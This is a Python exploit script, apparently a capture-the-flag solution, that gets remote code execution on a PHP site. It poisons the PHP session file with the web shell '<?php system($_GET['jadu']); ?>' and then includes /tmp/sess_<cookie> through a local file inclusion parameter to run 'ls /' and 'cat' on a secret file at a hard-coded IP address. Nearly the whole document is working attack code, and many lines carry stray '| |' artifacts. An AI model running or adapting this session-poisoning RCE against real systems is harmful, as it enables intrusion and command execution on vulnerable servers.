get the flag OOPs style
#!/usr/bin/python3 | |
import re
import sys
from urllib.parse import quote

from requests import Session
class RCE: | |
def __init__(self, url): | |
self.s = Session() | |
self.url = url | |
def send_payload(self): | |
self.s.get(self.url + "?karma=" + "<?php system($_GET['jadu']); ?>") | |
def payload(self, cookie, cmd=None): | |
if cmd: | |
return f"?karma=/tmp/sess_{cookie}&jadu={cmd}" | |
else: | |
return f"?karma=/tmp/sess_{cookie}" | |
def run(self): | |
r = self.s.get(self.url) | |
# get the location of the session file | |
cookie = r.cookies.get_dict()["PHPSESSID"] | |
r = self.s.get(self.url + self.payload(cookie)) | |
self.send_payload() | |
r = self.s.get(self.url + self.payload(cookie, "ls /")) | |
file = re.findall("seCretJutsuToKillBorUtoKun.txt", r.text)[0] | |
if len(file) == 0: | |
print("Oops something wrong no output found!!") | |
exit(-1) | |
self.send_payload() | |
r = self.s.get(self.url + self.payload(cookie, f"cat /{file}")) | |
msg = r.text.split(":")[-1] | |
print(msg) | |
flag = re.findall("FLAG{.*}", msg)[-1] | |
print("\nFlag: " + flag) | |
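def main() -> None:
    """Entry point.

    The target URL may be given as ``argv[1]``; it defaults to the CTF host
    the original script hard-coded.  A trailing ``/`` is ensured because the
    exploit concatenates ``url + "?karma=..."`` directly.
    """
    url = sys.argv[1] if len(sys.argv) > 1 else "http://44.200.237.73/"
    if not url.endswith("/"):
        url += "/"
    RCE(url).run()


if __name__ == "__main__":
    main()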